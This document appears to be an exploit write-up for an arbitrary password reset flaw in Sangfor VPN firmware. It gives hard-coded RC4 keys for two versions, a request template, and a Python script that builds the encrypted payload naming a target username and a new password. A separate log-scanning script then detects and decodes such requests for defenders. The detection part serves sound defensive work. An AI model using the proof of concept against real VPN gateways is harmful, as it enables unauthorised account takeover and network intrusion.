Sangfor VPN arbitrary password reset
Affected versions
Known affected: M7.6.6R1 and M7.6.1. Other versions have yet to be tested.
Vulnerability PoC
The key for M7.6.6R1 is 20181118; the key for M7.6.1 is 20100720.

```
https://
sessReq=clusterd&sessid=0&str=RC4_STR&len=RC4_STR_LEN
```

Script for computing RC4_STR_LEN:

```python
from Crypto.Cipher import ARC4
from binascii import a2b_hex


def myRC4(data, key):
    # RC4-encrypt data with key and return the ciphertext as a hex string
    rc41 = ARC4.new(key.encode())
    encrypted = rc41.encrypt(data.encode())
    return encrypted.hex()


def rc4_decrpt_hex(data, key):
    # Decrypt a hex-encoded RC4 ciphertext with key
    rc41 = ARC4.new(key.encode())
    return rc41.decrypt(a2b_hex(data))


key = '20100720'
data = r',username=TARGET_USERNAME,ip=127.0.0.1,grpid=1,pripsw=suiyi,newpsw=TARGET_PASSWORD,'
print(myRC4(data, key))
```
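On the detection side, the request shape and the fixed keys listed above are enough to flag these requests in gateway logs and to recover which account each one targeted. The following is an added example, not code from the original page or from the vendor. It assumes a common-log-format access log with the parameters logged in the query string; the path, addresses and username in the sample are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs
# Hard-coded RC4 keys given on this page, by firmware version.
KNOWN_KEYS = {"M7.6.6R1": b"20181118", "M7.6.1": b"20100720"}
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def rc4(key, data):
    """Plain RC4 in pure Python; the same call decrypts and encrypts."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i, j, out = 0, 0, bytearray()
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def decode_str(hex_blob):
    """Return (firmware, username) if the blob decrypts to a reset record, else None."""
    try:
        blob = bytes.fromhex(hex_blob)
    except ValueError:
        return None
    for firmware, key in KNOWN_KEYS.items():
        plain = rc4(key, blob).decode("latin-1")
        fields = dict(f.split("=", 1) for f in plain.split(",") if "=" in f)
        if "username" in fields and "newpsw" in fields:
            return firmware, fields["username"]  # password deliberately not returned
    return None

def scan(lines):
    """Return (client_ip, firmware, username) for each sessReq=clusterd request."""
    hits = []
    for line in lines:
        m = REQ.match(line)
        q = parse_qs(urlsplit(m.group(2)).query) if m else {}
        if q.get("sessReq") == ["clusterd"] and "str" in q:
            fw, user = decode_str(q["str"][0]) or ("unknown key", None)
            hits.append((m.group(1), fw, user))
    return hits

# Constructed sample log (hypothetical path, addresses, user); len=0 is a placeholder.
_blob = rc4(b"20100720", b",username=alice,ip=127.0.0.1,grpid=1,pripsw=x,newpsw=y,").hex()
SAMPLE = [
    '198.51.100.9 - - [01/Jan/2020:00:00:01 +0000] "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [01/Jan/2020:00:00:02 +0000] "GET /PATH_PLACEHOLDER?sessReq=clusterd&sessid=0&str=%s&len=0 HTTP/1.1" 200 12' % _blob,
]
```

A hit reported with `unknown key` means the request matched the parameter pattern but did not decrypt under either listed key, which is still worth reviewing given that other versions are untested.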